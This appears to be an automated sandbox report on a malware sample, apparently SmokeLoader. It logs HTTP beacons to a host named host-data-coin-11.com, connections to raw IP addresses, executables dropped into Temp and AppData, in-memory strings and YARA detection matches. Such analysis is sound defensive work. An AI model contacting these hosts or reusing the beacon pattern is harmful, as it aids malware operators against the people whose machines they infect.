20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef a8 8d 70 bc 57 da 4a d5 fe 24 85 21 ed c3 95 53 2f e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9KpWJ$!S/c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 08:14:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 45.9.20.149
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.76.197

Source: 12F1.exe, 00000009.00000000.772392521.0000000000D27000.00000002.00020000.sdmp, 12F1.exe, 00000009.00000002.949620420.0000000000D27000.00000002.00020000.sdmp, 12F1.exe, 00000009.00000003.774260268.0000000002921000.00000004.00000001.sdmp, 12F1.exe.6.dr	String found in binary or memory: src="https://www.facebook.com/tr?id=485425442358926&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: 12F1.exe, 00000009.00000002.976286050.000000000343B000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.975344152.0000000003377000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.979265997.0000000003773000.00000004.00000001.sdmp, 12F1.exe, 00000009.00000002.977234985.00000000034FD000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.973928794.0000000002C95000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.961266792.0000000002954000.00000004.00000001.sdmp, 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: .m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: 1EAA.exe, 00000014.00000002.964360486.0000000002A71000.00000004.00000001.sdmp	String found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbriredl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: host-data-coin-11.com

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49832 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 0000000C.00000002.814172336.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.736880382.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.737014881.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.854879480.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.853177748.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.815844712.0000000002091000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.724058055.0000000004F41000.00000020.00020000.sdmp, type: MEMORY

Source: v72n86vFFq.exe, 00000000.00000002.684032858.00000000007DA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 1EAA.exe.6.dr, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736
Source: 10.0.1EAA.exe.e80000.1.unpack, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736
Source: 10.0.1EAA.exe.e80000.3.unpack, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736
Source: 10.0.1EAA.exe.e80000.0.unpack, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736
Source: 10.2.1EAA.exe.e80000.0.unpack, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736
Source: 10.0.1EAA.exe.e80000.2.unpack, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736
Source: 14.2.1EAA.exe.410000.0.unpack, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736
Source: 14.0.1EAA.exe.410000.1.unpack, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736
Source: 14.0.1EAA.exe.410000.3.unpack, Oldening.Stubs/PageContainerStub.cs	Large array initialization: PopInfo: array initializer size 189736

PE file contains section with special chars

Show sources

Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name:
Source: 305.exe.6.dr	Static PE information: section name:

PE file has nameless sections

Show sources

Source: 12F1.exe.6.dr	Static PE information: section name:
Source: 12F1.exe.6.dr	Static PE information: section name:
Source: 12F1.exe.6.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\361B.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 520

Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 0_2_00439EA0
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00402A5F
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_2_00402AB3
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_00402A5F
Source: C:\Users\user\Desktop\v72n86vFFq.exe	Code function: 4_1_00402B2E
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 8_2_004E3253
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 8_2_004E31FF
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEE0A1
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE52CD
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DED3D1
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEF301
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEC401
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE8509
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DDE532
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEC8A1
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEE861
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE8801
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DED9C1
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE89E3
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE3AC2
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE4BF1
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE3C15
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DF4DD6
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEBDF1
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DECDE1
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DE8D2C
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00DEEF91
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00EA7058
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00EA0A98
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00ECC1BA
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00ECC958
Source: C:\Users\user\AppData\Local\Temp\12F1.exe	Code function: 9_2_00F20048
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_017E3870
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_017E5B20
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_017EAAD8
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_017EEF88
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_017E6EE0
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_017E8518
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_017EEF60
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_05839048
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_058383D0
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_0583A7D8
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_0583CB10
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_0583BE70
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_0583D270
Source: C:\Users\user\AppData\Local\Temp\1EAA.exe	Code function: 10_2_0583DED8
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00402A5F
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_2_00402AB3
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_00402A5F
Source: C:\Users\user\AppData\Roaming\hiftsuu	Code function: 12_1_00402AB3
Source: C:\Users\user\AppData\Local\Temp\361B.exe	Code function: 13_2_004027CA
Source: C:\Users\user\AppData\Local\Temp\361B.exe	Code function: 13_2_00401FF1
Source: C:\Users\user\AppData\Local\Temp\361B.exe	Code function: 13_2_0040158E
Source: C:\Users\user\AppData\Local\Temp\361B.exe	Code function: 13_2_004015A6
Source: C:\Users\user\AppData\Local\Temp\361B.exe	Code function: 13_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_00410E10
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_0040FF80
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_00410580
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_00410390
Source: C:\Users\user\AppData\Local\Temp\44A2.exe	Code function: 17_2_0043DA00

Source: 12F1.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 361B.exe.6.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: 361B.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 361B.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\2340.exe	Section loaded: mscorjit.dll

Source: v72n86vFFq.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 10.2.1EAA.exe.45835c0.2.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 20.2.1EAA.exe.2c0bae6.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000A.00000002.845557160.000000000434F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 0000000A.00000002.847931111.0000000004503000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
